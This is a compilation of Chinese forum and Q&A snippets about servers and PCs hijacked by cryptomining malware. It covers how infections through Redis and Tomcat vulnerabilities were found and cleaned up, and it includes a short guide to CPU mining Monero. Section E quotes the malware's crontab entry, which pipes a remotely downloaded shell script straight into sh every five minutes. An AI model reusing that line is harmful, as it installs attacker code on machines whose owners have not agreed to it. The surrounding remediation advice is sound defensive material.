多进程挖矿

A. 求助服务器被挖矿程序入侵，如何排查

新客户于最近向我们SINE安全公司咨询，说他的服务器经常卡的网站无法打开，远程连接

服务器的慢的要命，有时候PING值都达到300-500之间，还经常掉包，听客户这么一说，一般

会判断为受到了CC+DDOS混合流量攻击，再具体一问，说是机房那面没有受到流量攻击，这

就有点奇怪了，不是流量攻击，还导致服务器卡，网站无法打开，这是什么攻击？为了解决客

户服务器卡的问题，我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。

挖矿木马还设计了挖矿进程如果被客户强制停止后，会自动启动继续挖矿，达到不间断的挖矿，

仔细检查发现是通过设置了每个小时执行任务计划，远程下载shell挖矿木马，然后执行，检查

当前进程是否存在，不存在就启动挖矿木马，进行挖矿。

对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据，以及感染蠕虫的病

毒，如果数据被加密那损失大了，客户是做平台的，里面的客户数据很重要，找出挖矿木马后，

客户需要知道服务器到底是如何被攻击的？ 被上传挖矿木马的？ 防止后期再出现这样的攻击

状况。

通过我们安全工程师的安全检测与分析，发现该服务器使用的是apache tomcat环境，平台的开

发架构是JSP+oracle数据库，apache tomcat使用的是2016年的版本，导致该apache存在严重

的远程执行命令漏洞，入侵者可以通过该漏洞直接入侵服务器，拿到服务器的管理员权限，

SINE安全工程师立即对apache 漏洞进行修复，并清除木马，至此问题得以解决，客户服务器

一切稳定运行，网站打开正常。

B. 如何用Linux服务器挖矿教程

今天早上起来一看，服务器脚本一个都没有启动!甚是奇怪，远程登录服务器，也是异常的卡，直到最后卡死，只好重新启动服务器!
启动之后没一会又会变卡，越来越卡，top查看进程！不觉又奇怪的进程，因为平常也不经常看！所以自己也搞不明白怎么回事儿！只好到群里问了问，说是被挖矿的挂了木马文件了，是由于redis的漏洞!
后来我自己发现，原来redis远程可以直接登录，原以为redis和mysql不开放登录权限就不会支持远程登录呢，看来是我想多了
看了好长时间才发现一个异常的进程，自启的进程 molibe ！
找到进程位置 ps -ef|grep molibe ;
在tmp目录下，打开一看的确是有
chmod -x molibe 取消执行权限在来到/var/spool/cron下，cat root 查看定时器的执行发现之前脚本都被改了，顾不得删除cron，service crond restart 重新启动,再有就时kill 掉molibe进程
这样大概整个就结束了！但是根本是因为redis漏洞，所以还是补上吧
首先修改redis'端口,找到redis.conf文件 port **** 修改端口号再有就是必须修改密码 # requirepass ******** 去除#号重新启动 /redis/src/redis-server /redis/redis-conf
启动成功之后
redis/redis-cli -p ****(端口) -a *****(密码)

C. win2008服务器中了挖矿病毒，求解答！

不能完全杀干净的前提下，备份好自己的数据，然后重装系统，不然这样耽误工作真的很麻烦

D. 如何用cpu挖矿

门罗币反矿机适合CPU挖矿

门罗币最新官方windows钱包下载地址:

1.下载好挖矿软件，解压。鼠标右键点击：“启动.cmd”，弹出菜单中选择“编辑”。

粘贴修改为之前你得到的钱包接收地址，这样挖矿得到的矿是进您的钱包。

2.双击启动.cmd，开始挖矿。

第1次运行可能会出现reboot等字样，您就按它的英文操作，右击“启动.cmd”，选择以管理员运行，然后重新电脑，使aes-ni生效后，再次正常高效运行挖矿赚钱。

E. 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

F. 我在玩一个游戏，想在里面多开几个小号挖矿。但是开了3个之后就开始提示内存不足。有没有方法可以解决，

既然你可以开3个以上才给你提示 那就是你的配置极限了 虚拟机更费CPU和内存 而且设置还是比较繁琐的。别人用虚拟机只是为了 摆脱游戏制作商对多开的限制罢了

还是想办法怎么节省点内存吧 把不需要的程序进程关闭 可以用下windows优化大师释放下内存 还有就是加条内存。。或者找脱机wg~~

G. 我的阿里云骑士报挖矿进程啥意思

中毒了，被黑客夺取了控制权限，然后用你的机器帮黑客赚钱

H. Linux系统被Carbon挖矿病毒入侵，杀掉之后过一段时间又起来了，有谁遇到过这种情况啊

这种病毒腾讯安全提到过
可以去下载安装一个腾讯御点
打开之后，使用里面的病毒查杀功能，直接就可以查杀这种电脑病毒了

I. 玩lol的时候就会有个进程BCWeb。exe的进程在后台偷偷挖矿，然后玩游戏会特别卡，关闭该进程后游戏正常

那个是个恶意程序，你右键这个进程，然后进入其所在的文件夹，然后清理即可